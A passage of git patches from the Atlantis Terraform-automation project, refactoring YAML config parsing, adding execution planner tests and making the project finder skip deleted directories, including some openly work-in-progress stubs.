+package runtime diff --git a/server/events/yaml/reader.go b/server/events/yaml/parser_validator.go similarity index 59% rename from server/events/yaml/reader.go rename to server/events/yaml/parser_validator.go index eaea835393..8612015043 100644 --- a/server/events/yaml/reader.go +++ b/server/events/yaml/parser_validator.go @@ -5,49 +5,46 @@ import ( "io/ioutil" "os" "path/filepath" - "strings" "github.com/pkg/errors" "gopkg.in/yaml.v2" ) +// AtlantisYAMLFilename is the name of the config file for each repo. const AtlantisYAMLFilename = "atlantis.yaml" -const PlanStageName = "plan" -const ApplyStageName = "apply" -type Reader struct{} +type ParserValidator struct{} -// ReadConfig returns the parsed and validated config for repoDir. -// If there was no config, it returns a nil pointer. -func (r *Reader) ReadConfig(repoDir string) (*Config, error) { +// ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. +// If there was no config file, then this can be detected by checking the type +// of error: os.IsNotExist(error). +func (r *ParserValidator) ReadConfig(repoDir string) (Config, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) - // If the file doesn't exist return nil. + // NOTE: the error we return here must also be os.IsNotExist since that's + // what our callers use to detect a missing config file. if err != nil && os.IsNotExist(err) { - return nil, nil + return Config{}, err } // If it exists but we couldn't read it return an error. if err != nil { - return nil, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) + return Config{}, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename) } // If the config file exists, parse it. 
config, err := r.parseAndValidate(configData) if err != nil { - return nil, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) + return Config{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } - return &config, err + return config, err } -func (r *Reader) parseAndValidate(configData []byte) (Config, error) { +func (r *ParserValidator) parseAndValidate(configData []byte) (Config, error) { var repoConfig Config if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil { - // Unmarshal error messages aren't fit for user output. We need to - // massage them. - // todo: fix "field autoplan not found in struct yaml.alias" errors - return repoConfig, errors.New(strings.Replace(err.Error(), " into yaml.Config", "", -1)) + return repoConfig, err } // Validate version. diff --git a/server/events/yaml/reader_test.go b/server/events/yaml/parser_validator_test.go similarity index 71% rename from server/events/yaml/reader_test.go rename to server/events/yaml/parser_validator_test.go index 7dc4b25b4c..4adc8ca34d 100644 --- a/server/events/yaml/reader_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -2,6 +2,7 @@ package yaml_test import ( "io/ioutil" + "os" "path/filepath" "testing" @@ -10,20 +11,18 @@ import ( ) func TestReadConfig_DirDoesNotExist(t *testing.T) { - r := yaml.Reader{} - conf, err := r.ReadConfig("/not/exist") - Ok(t, err) - Assert(t, conf == nil, "exp nil ptr") + r := yaml.ParserValidator{} + _, err := r.ReadConfig("/not/exist") + Assert(t, os.IsNotExist(err), "exp nil ptr") } func TestReadConfig_FileDoesNotExist(t *testing.T) { tmpDir, cleanup := TempDir(t) defer cleanup() - r := yaml.Reader{} - conf, err := r.ReadConfig(tmpDir) - Ok(t, err) - Assert(t, conf == nil, "exp nil ptr") + r := yaml.ParserValidator{} + _, err := r.ReadConfig(tmpDir) + Assert(t, os.IsNotExist(err), "exp nil ptr") } func TestReadConfig_BadPermissions(t *testing.T) { @@ -32,7 +31,7 @@ func TestReadConfig_BadPermissions(t *testing.T) { err := 
ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} _, err = r.ReadConfig(tmpDir) ErrContains(t, "unable to read atlantis.yaml file: ", err) } @@ -48,7 +47,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { { "random characters", "slkjds", - "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds`", + "parsing atlantis.yaml: yaml: unmarshal errors:\n line 1: cannot unmarshal !!str `slkjds` into yaml.Config", }, { "just a colon", @@ -64,7 +63,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) { t.Run(c.description, func(t *testing.T) { err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, c.expErr, err) }) @@ -161,175 +160,6 @@ projects: - unknown: value`, expErr: "yaml: unmarshal errors:\n line 4: field unknown not found in struct yaml.alias", }, - - // project workflow doesn't exist - // workflow has plan and apply keys (otherwise no point specifying it) - // plan/apply stages must have non-empty steps key - - // Test the steps key. - { - description: "unsupported step type", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - unsupported`, - expErr: "unsupported step type: \"unsupported\"", - }, - - // Init step. - { - description: "unsupported arg to init step", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init: - extra_args: ["hi"] - hi: bye -`, - expErr: "unsupported key \"hi\" for step init – the only supported key is extra_args", - }, - { - description: "invalid value type to init step's extra_args", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - init: - extra_args: arg -`, - expErr: "expected array of strings as value of extra_args, not \"arg\"", - }, - - // Plan step. 
- { - description: "unsupported arg to plan step", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - plan: - extra_args: ["hi"] - hi: bye -`, - expErr: "unsupported key \"hi\" for step plan – the only supported key is extra_args", - }, - { - description: "invalid value type to plan step's extra_args", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - plan: - extra_args: arg -`, - expErr: "expected array of strings as value of extra_args, not \"arg\"", - }, - - // Apply step. - { - description: "unsupported arg to apply step", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - apply: - extra_args: ["hi"] - hi: bye -`, - expErr: "unsupported key \"hi\" for step apply – the only supported key is extra_args", - }, - { - description: "invalid value type to apply step's extra_args", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - apply: - extra_args: arg -`, - expErr: "expected array of strings as value of extra_args, not \"arg\"", - }, - { - description: "invalid step type", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - steps: - - rn: echo should fail -`, - expErr: "yaml: unmarshal errors:\n line 9: field rn not found in struct struct { Run string \"yaml:\\\"run\\\"\" }", - }, - { - description: "missed the steps key and just set an array directly", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: - - init -`, - expErr: "missing \"steps\" key", - }, - { - description: "no value after plan:", - input: ` -version: 2 -projects: -- dir: "." -workflows: - default: - plan: -`, - expErr: "missing \"steps\" key", - }, - { - description: "no value after apply:", - input: ` -version: 2 -projects: -- dir: "." 
-workflows: - default: - plan: -`, - expErr: "missing \"steps\" key", - }, } tmpDir, cleanup := TempDir(t) @@ -340,7 +170,7 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} _, err = r.ReadConfig(tmpDir) ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err) }) @@ -595,7 +425,7 @@ workflows: Steps: []yaml.StepConfig{ { StepType: "init", - ExtraArgs: nil, + ExtraArgs: []string{}, }, { StepType: "plan", @@ -642,18 +472,16 @@ workflows: Plan: &yaml.Stage{ Steps: []yaml.StepConfig{ { - StepType: "run", - ExtraArgs: nil, - Run: []string{"echo", "plan hi"}, + StepType: "run", + Run: []string{"echo", "plan hi"}, }, }, }, Apply: &yaml.Stage{ Steps: []yaml.StepConfig{ { - StepType: "run", - ExtraArgs: nil, - Run: []string{"echo", "apply", "arg 2"}, + StepType: "run", + Run: []string{"echo", "apply", "arg 2"}, }, }, }, @@ -671,10 +499,10 @@ workflows: err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600) Ok(t, err) - r := yaml.Reader{} + r := yaml.ParserValidator{} act, err := r.ReadConfig(tmpDir) Ok(t, err) - Equals(t, &c.expOutput, act) + Equals(t, c.expOutput, act) }) } } diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go index b2c136e59d..dade99baef 100644 --- a/server/events/yaml/project.go +++ b/server/events/yaml/project.go @@ -9,12 +9,14 @@ type Project struct { ApplyRequirements []string `yaml:"apply_requirements"` } +const DefaultWorkspace = "default" + func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { // Use a type alias so unmarshal doesn't get into an infinite loop. type alias Project // Set up defaults. 
defaults := alias{ - Workspace: defaultWorkspace, + Workspace: DefaultWorkspace, AutoPlan: &AutoPlan{ Enabled: true, WhenModified: []string{"**/*.tf"}, diff --git a/server/events/yaml/run_step_test.go b/server/events/yaml/run_step_test.go deleted file mode 100644 index d00e3ec788..0000000000 --- a/server/events/yaml/run_step_test.go +++ /dev/null @@ -1,3 +0,0 @@ -package yaml - -// todo diff --git a/server/events/yaml/yaml.go b/server/events/yaml/yaml.go new file mode 100644 index 0000000000..08b884cae0 --- /dev/null +++ b/server/events/yaml/yaml.go @@ -0,0 +1,4 @@ +// Package yaml contains the golang representations of the YAML elements +// supported in atlantis.yaml. Many of the elements implement UnmarshalYAML +// in order to set defaults. +package yaml diff --git a/server/server.go b/server/server.go index 9381d74690..8ae0e5b6eb 100644 --- a/server/server.go +++ b/server/server.go @@ -37,6 +37,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking/boltdb" "github.com/runatlantis/atlantis/server/events/models" "github.com/runatlantis/atlantis/server/events/run" + "github.com/runatlantis/atlantis/server/events/runtime" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" "github.com/runatlantis/atlantis/server/events/webhooks" @@ -200,8 +201,8 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) { ConfigReader: configReader, Terraform: terraformClient, } - executionPlanner := &yaml.ExecutionPlanner{ - ConfigReader: &yaml.Reader{}, + executionPlanner := &runtime.ExecutionPlanner{ + ParserValidator: &yaml.ParserValidator{}, DefaultTFVersion: terraformClient.Version(), TerraformExecutor: terraformClient, } From 437b62591a467e54b7e5ff42295dd626a9167daf Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Fri, 8 Jun 2018 20:58:29 +0100 Subject: [PATCH 16/69] Test execution_planner --- server/events/runtime/execution_planner.go | 22 +- .../events/runtime/execution_planner_test.go | 
198 ++++++++++++++++++ testing/temp_files.go | 4 +- 3 files changed, 212 insertions(+), 12 deletions(-) create mode 100644 server/events/runtime/execution_planner_test.go diff --git a/server/events/runtime/execution_planner.go b/server/events/runtime/execution_planner.go index 012d6b008d..401efa7c4e 100644 --- a/server/events/runtime/execution_planner.go +++ b/server/events/runtime/execution_planner.go @@ -35,6 +35,17 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str }, nil } +func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { + defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) + if err != nil { + return nil, err + } + return &ApplyStage{ + Steps: steps, + }, nil +} + func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) { config, err := s.ParserValidator.ReadConfig(repoDir) @@ -108,17 +119,6 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge return defaults, nil } -func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { - defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) - if err != nil { - return nil, err - } - return &ApplyStage{ - Steps: steps, - }, nil -} - func (s *ExecutionPlanner) buildMeta(log 
*logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) StepMeta { return StepMeta{ Log: log, diff --git a/server/events/runtime/execution_planner_test.go b/server/events/runtime/execution_planner_test.go new file mode 100644 index 0000000000..9c3fd5ac4d --- /dev/null +++ b/server/events/runtime/execution_planner_test.go @@ -0,0 +1,198 @@ +package runtime_test + +import ( + "io/ioutil" + "path/filepath" + "testing" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/logging" + . "github.com/runatlantis/atlantis/testing" +) + +// When there is no config file, should use the defaults. +func TestBuildStage_NoConfigFile(t *testing.T) { + var defaultTFVersion *version.Version + var terraformExecutor runtime.TerraformExec + e := runtime.ExecutionPlanner{ + DefaultTFVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + } + + log := logging.NewNoopLogger() + repoDir := "/willnotexist" + workspace := "myworkspace" + relProjectPath := "mydir" + var extraCommentArgs []string + username := "myuser" + meta := runtime.StepMeta{ + Log: log, + Workspace: workspace, + AbsolutePath: filepath.Join(repoDir, relProjectPath), + DirRelativeToRepoRoot: relProjectPath, + TerraformVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + ExtraCommentArgs: extraCommentArgs, + Username: username, + } + + // Test the plan stage first. + t.Run("plan stage", func(t *testing.T) { + planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.PlanStage{ + Steps: []runtime.Step{ + &runtime.InitStep{ + Meta: meta, + }, + &runtime.PlanStep{ + Meta: meta, + }, + }, + }, *planStage) + }) + + // Then the apply stage. 
+ t.Run("apply stage", func(t *testing.T) { + applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.ApplyStage{ + Steps: []runtime.Step{ + &runtime.ApplyStep{ + Meta: meta, + }, + }, + }, *applyStage) + }) +} + +func TestBuildStage(t *testing.T) { + var defaultTFVersion *version.Version + var terraformExecutor runtime.TerraformExec + e := runtime.ExecutionPlanner{ + DefaultTFVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + } + + // Write atlantis.yaml config. + tmpDir, cleanup := TempDir(t) + defer cleanup() + err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(` +version: 2 +projects: +- dir: "." + workflow: custom +workflows: + custom: + plan: + steps: + - init: + extra_args: [arg1, arg2] + - plan + - run: echo hi + apply: + steps: + - run: prerun + - apply: + extra_args: [arg3, arg4] + - run: postrun +`), 0644) + Ok(t, err) + + repoDir := tmpDir + log := logging.NewNoopLogger() + workspace := "myworkspace" + // Our config is for '.' so there will be no config for this project. + relProjectPath := "mydir" + var extraCommentArgs []string + username := "myuser" + meta := runtime.StepMeta{ + Log: log, + Workspace: workspace, + AbsolutePath: filepath.Join(repoDir, relProjectPath), + DirRelativeToRepoRoot: relProjectPath, + TerraformVersion: defaultTFVersion, + TerraformExecutor: terraformExecutor, + ExtraCommentArgs: extraCommentArgs, + Username: username, + } + + t.Run("plan stage for project without config", func(t *testing.T) { + // This project isn't listed so it should get the defaults. 
+ planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.PlanStage{ + Steps: []runtime.Step{ + &runtime.InitStep{ + Meta: meta, + }, + &runtime.PlanStep{ + Meta: meta, + }, + }, + }, *planStage) + }) + + t.Run("apply stage for project without config", func(t *testing.T) { + // This project isn't listed so it should get the defaults. + applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + Ok(t, err) + Equals(t, runtime.ApplyStage{ + Steps: []runtime.Step{ + &runtime.ApplyStep{ + Meta: meta, + }, + }, + }, *applyStage) + }) + + // Create the meta for the custom project. + customMeta := meta + customMeta.Workspace = "default" + customMeta.DirRelativeToRepoRoot = "." + customMeta.AbsolutePath = tmpDir + + t.Run("plan stage for custom config", func(t *testing.T) { + planStage, err := e.BuildPlanStage(log, repoDir, "default", ".", extraCommentArgs, username) + Ok(t, err) + + Equals(t, runtime.PlanStage{ + Steps: []runtime.Step{ + &runtime.InitStep{ + Meta: customMeta, + ExtraArgs: []string{"arg1", "arg2"}, + }, + &runtime.PlanStep{ + Meta: customMeta, + }, + &runtime.RunStep{ + Meta: customMeta, + Commands: []string{"echo", "hi"}, + }, + }, + }, *planStage) + }) + + t.Run("apply stage for custom config", func(t *testing.T) { + planStage, err := e.BuildApplyStage(log, repoDir, "default", ".", extraCommentArgs, username) + Ok(t, err) + + Equals(t, runtime.ApplyStage{ + Steps: []runtime.Step{ + &runtime.RunStep{ + Meta: customMeta, + Commands: []string{"prerun"}, + }, + &runtime.ApplyStep{ + Meta: customMeta, + ExtraArgs: []string{"arg3", "arg4"}, + }, + &runtime.RunStep{ + Meta: customMeta, + Commands: []string{"postrun"}, + }, + }, + }, *planStage) + }) +} diff --git a/testing/temp_files.go b/testing/temp_files.go index f91074967a..85dd68c5b1 100644 --- a/testing/temp_files.go +++ b/testing/temp_files.go @@ -7,7 +7,9 @@ import ( ) // 
TempDir creates a temporary directory and returns its path along -// with a cleanup function to be called via defer. +// with a cleanup function to be called via defer, ex: +// dir, cleanup := TempDir() +// defer cleanup() func TempDir(t *testing.T) (string, func()) { tmpDir, err := ioutil.TempDir("", "") Ok(t, err) From 9839e0dac1f31583be4c68c38cbeb25408aa4074 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Mon, 11 Jun 2018 18:00:57 +0100 Subject: [PATCH 17/69] Move execution planner. Don't plan in deleted dirs --- .../events/{runtime => }/execution_planner.go | 53 +++++++- .../{runtime => }/execution_planner_test.go | 0 server/events/project_finder.go | 42 +++++-- server/events/project_finder_test.go | 116 +++++++++++------- 4 files changed, 154 insertions(+), 57 deletions(-) rename server/events/{runtime => }/execution_planner.go (74%) rename server/events/{runtime => }/execution_planner_test.go (100%) diff --git a/server/events/runtime/execution_planner.go b/server/events/execution_planner.go similarity index 74% rename from server/events/runtime/execution_planner.go rename to server/events/execution_planner.go index 401efa7c4e..eee10f5890 100644 --- a/server/events/runtime/execution_planner.go +++ b/server/events/execution_planner.go @@ -6,6 +6,7 @@ import ( "path/filepath" "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events" "github.com/runatlantis/atlantis/server/events/yaml" "github.com/runatlantis/atlantis/server/logging" ) @@ -18,13 +19,14 @@ type ExecutionPlanner struct { TerraformExecutor TerraformExec DefaultTFVersion *version.Version ParserValidator *yaml.ParserValidator + ProjectFinder events.ProjectFinder } type TerraformExec interface { RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) } -func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, 
username string) (*PlanStage, error) { +func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (PlanStage, error) { defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) if err != nil { @@ -35,6 +37,55 @@ func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir str }, nil } +func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]PlanStage, error) { + // If there is an atlantis.yaml + // -> Get modified files from pull request. + // -> For each project, if autoplan == true && files match + // ->-> Build plan stage for that project. + // Else + // -> Get modified files + // -> For each modified project use default plan stage. + config, err := s.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return nil, err + } + + // If there is no config file, then we try to plan for each project that + // was modified in the pull request. + if os.IsNotExist(err) { + projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir) + var stages []PlanStage + for _, p := range projects { + // NOTE: we use the default workspace because we don't know about + // other workspaces. If users want to plan for other workspaces they + // need to use a config file. + steps := s.defaultPlanSteps(log, repoDir, defaultWorkspace, p.Path, nil, username) + stages = append(stages, PlanStage{ + Steps: steps, + }) + } + return stages, nil + } + + // Else we run plan according to the config file. 
+ var stages []PlanStage + for _, p := range config.Projects { + if s.shouldAutoplan(p.AutoPlan, modifiedFiles) { + // todo + stages = append(stages) + } + } + return stages, nil +} + +func (s *ExecutionPlanner) shouldAutoplan(autoplan yaml.AutoPlan, modifiedFiles []string) bool { + +} + +func (s *ExecutionPlanner) getSteps() { + +} + func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) diff --git a/server/events/runtime/execution_planner_test.go b/server/events/execution_planner_test.go similarity index 100% rename from server/events/runtime/execution_planner_test.go rename to server/events/execution_planner_test.go diff --git a/server/events/project_finder.go b/server/events/project_finder.go index e14c3b7e72..315f480bd5 100644 --- a/server/events/project_finder.go +++ b/server/events/project_finder.go @@ -49,19 +49,26 @@ func (p *DefaultProjectFinder) DetermineProjects(log *logging.SimpleLogger, modi log.Info("filtered modified files to %d .tf files: %v", len(modifiedTerraformFiles), modifiedTerraformFiles) - var paths []string + var dirs []string for _, modifiedFile := range modifiedTerraformFiles { - projectPath := p.getProjectPath(modifiedFile, repoDir) - if projectPath != "" { - paths = append(paths, projectPath) + projectDir := p.getProjectDir(modifiedFile, repoDir) + if projectDir != "" { + dirs = append(dirs, projectDir) } } - uniquePaths := p.unique(paths) - for _, uniquePath := range uniquePaths { - projects = append(projects, models.NewProject(repoFullName, uniquePath)) + uniqueDirs := p.unique(dirs) + + // The list of modified files will include files that were deleted. 
We still + // want to run plan if a file was deleted since that often results in a + // change however we want to remove directories that have been completely + // deleted. + exists := p.filterToDirExists(uniqueDirs, repoDir) + + for _, p := range exists { + projects = append(projects, models.NewProject(repoFullName, p)) } log.Info("there are %d modified project(s) at path(s): %v", - len(projects), strings.Join(uniquePaths, ", ")) + len(projects), strings.Join(exists, ", ")) return projects } @@ -84,12 +91,12 @@ func (p *DefaultProjectFinder) isInExcludeList(fileName string) bool { return false } -// getProjectPath attempts to determine based on the location of a modified +// getProjectDir attempts to determine based on the location of a modified // file, where the root of the Terraform project is. It also attempts to verify // if the root is valid by looking for a main.tf file. It returns a relative -// path. If the project is at the root returns ".". If modified file doesn't -// lead to a valid project path, returns an empty string. -func (p *DefaultProjectFinder) getProjectPath(modifiedFilePath string, repoDir string) string { +// path to the repo. If the project is at the root returns ".". If modified file +// doesn't lead to a valid project path, returns an empty string. 
+func (p *DefaultProjectFinder) getProjectDir(modifiedFilePath string, repoDir string) string { dir := path.Dir(modifiedFilePath) if path.Base(dir) == "env" { // If the modified file was inside an env/ directory, we treat this @@ -159,3 +166,14 @@ func (p *DefaultProjectFinder) unique(strs []string) []string { } return unique } + +func (p *DefaultProjectFinder) filterToDirExists(relativePaths []string, repoDir string) []string { + var filtered []string + for _, pth := range relativePaths { + absPath := filepath.Join(repoDir, pth) + if _, err := os.Stat(absPath); !os.IsNotExist(err) { + filtered = append(filtered, pth) + } + } + return filtered +} diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go index dd9af7792f..8e787a6eec 100644 --- a/server/events/project_finder_test.go +++ b/server/events/project_finder_test.go @@ -30,24 +30,37 @@ var m = events.DefaultProjectFinder{} var nestedModules1 string var nestedModules2 string var topLevelModules string +var envDir string func setupTmpRepos(t *testing.T) { // Create different repo structures for testing. // 1. Nested modules directory inside a project + // non-tf + // terraform.tfstate + // terraform.tfstate.backup // project1/ // main.tf + // terraform.tfstate + // terraform.tfstate.backup // modules/ // main.tf var err error nestedModules1, err = ioutil.TempDir("", "") - Ok(t, err) err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700) Ok(t, err) - _, err = os.Create(filepath.Join(nestedModules1, "project1/main.tf")) - Ok(t, err) - _, err = os.Create(filepath.Join(nestedModules1, "project1/modules/main.tf")) - Ok(t, err) + files := []string{ + "non-tf", + "terraform.tfstate.backup", + "project1/main.tf", + "project1/terraform.tfstate", + "project1/terraform.tfstate.backup", + "project1/modules/main.tf", + } + for _, f := range files { + _, err = os.Create(filepath.Join(nestedModules1, f)) + Ok(t, err) + } // 2. 
Nested modules dir inside top-level project // main.tf @@ -71,6 +84,20 @@ func setupTmpRepos(t *testing.T) { _, err = os.Create(filepath.Join(topLevelModules, path, "main.tf")) Ok(t, err) } + + // 4. Env/ dir + // main.tf + // env/ + // staging.tfvars + // production.tfvars + envDir, err = ioutil.TempDir("", "") + Ok(t, err) + err = os.MkdirAll(filepath.Join(envDir, "env"), 0700) + Ok(t, err) + _, err = os.Create(filepath.Join(envDir, "env/staging.tfvars")) + Ok(t, err) + _, err = os.Create(filepath.Join(envDir, "env/production.tfvars")) + Ok(t, err) } func TestDetermineProjects(t *testing.T) { @@ -86,13 +113,13 @@ func TestDetermineProjects(t *testing.T) { "If no files were modified then should return an empty list", nil, nil, - "", + nestedModules1, }, { "Should ignore non .tf files and return an empty list", []string{"non-tf"}, nil, - "", + nestedModules1, }, { "Should plan in the parent directory from modules if that dir has a main.tf", @@ -128,65 +155,66 @@ func TestDetermineProjects(t *testing.T) { "Should ignore tfstate files and return an empty list", []string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"}, nil, - "", - }, - { - "Should ignore tfstate files and return an empty list", - []string{"terraform.tfstate", "terraform.tfstate.backup", "parent/terraform.tfstate", "parent/terraform.tfstate.backup"}, - nil, - "", + nestedModules1, }, { "Should return '.' 
when changed file is at root", []string{"a.tf"}, []string{"."}, - "", + nestedModules2, }, { "Should return directory when changed file is in a dir", - []string{"parent/a.tf"}, - []string{"parent"}, - "", + []string{"project1/a.tf"}, + []string{"project1"}, + nestedModules1, }, { "Should return parent dir when changed file is in an env/ dir", - []string{"env/a.tfvars"}, + []string{"env/staging.tfvars"}, []string{"."}, - "", + envDir, }, { "Should de-duplicate when multiple files changed in the same dir", - []string{"root.tf", "env/env.tfvars", "parent/parent.tf", "parent/parent2.tf", "parent/child/child.tf", "parent/child/env/env.tfvars"}, - []string{".", "parent", "parent/child"}, + []string{"env/staging.tfvars", "main.tf", "other.tf"}, + []string{"."}, + "", + }, + { + "Should ignore changes in a dir that was deleted", + []string{"wasdeleted/main.tf"}, + []string{}, "", }, } for _, c := range cases { - t.Log(c.description) - projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir) + t.Run(c.description, func(t *testing.T) { + projects := m.DetermineProjects(noopLogger, c.files, modifiedRepo, c.repoDir) - // Extract the paths from the projects. We use a slice here instead of a - // map so we can test whether there are duplicates returned. - var paths []string - for _, project := range projects { - paths = append(paths, project.Path) - // Check that the project object has the repo set properly. - Equals(t, modifiedRepo, project.RepoFullName) - } - Assert(t, len(c.expProjectPaths) == len(paths), - "exp %d paths but found %d. They were %v", len(c.expProjectPaths), len(paths), paths) + // Extract the paths from the projects. We use a slice here instead of a + // map so we can test whether there are duplicates returned. + var paths []string + for _, project := range projects { + paths = append(paths, project.Path) + // Check that the project object has the repo set properly. 
+ Equals(t, modifiedRepo, project.RepoFullName) + } + Assert(t, len(c.expProjectPaths) == len(paths), + "exp %q but found %q", c.expProjectPaths, paths) - for _, expPath := range c.expProjectPaths { - found := false - for _, actPath := range paths { - if expPath == actPath { - found = true - break + for _, expPath := range c.expProjectPaths { + found := false + for _, actPath := range paths { + if expPath == actPath { + found = true + break + } + } + if !found { + t.Fatalf("exp %q but was not in paths %v", expPath, paths) } } - if !found { - t.Fatalf("exp %q but was not in paths %v", expPath, paths) - } - } + }) } } From 3525ab3bd9d9858309a4b357482d39fca4ea9d09 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 12 Jun 2018 14:54:38 +0100 Subject: [PATCH 18/69] WIP --- CHANGELOG.md | 14 + server/events/apply_executor.go | 3 +- server/events/command_context.go | 4 +- server/events/command_handler.go | 2 - server/events/comment_parser.go | 2 +- server/events/event_parser.go | 26 +- server/events/event_parser_test.go | 10 +- server/events/execution_planner.go | 69 +-- server/events/execution_planner_test.go | 13 +- server/events/markdown_renderer.go | 48 +- server/events/mocks/mock_event_parsing.go | 14 +- server/events/models/models.go | 5 + server/events/plan_executor.go | 72 ++- server/events/plan_executor_test.go | 547 +++++++++++----------- server/events/project_result.go | 1 + server/events/runtime/repoconfig.go | 8 +- server/events/yaml/project.go | 14 +- server/events_controller.go | 99 +++- server/server.go | 6 +- 19 files changed, 553 insertions(+), 404 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 776ab26210..fc99816502 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,3 +1,17 @@ +# v0.4.0-alpha + +## Features + +## Bugfixes +* Won't attempt to run plan in a directory that was deleted. 
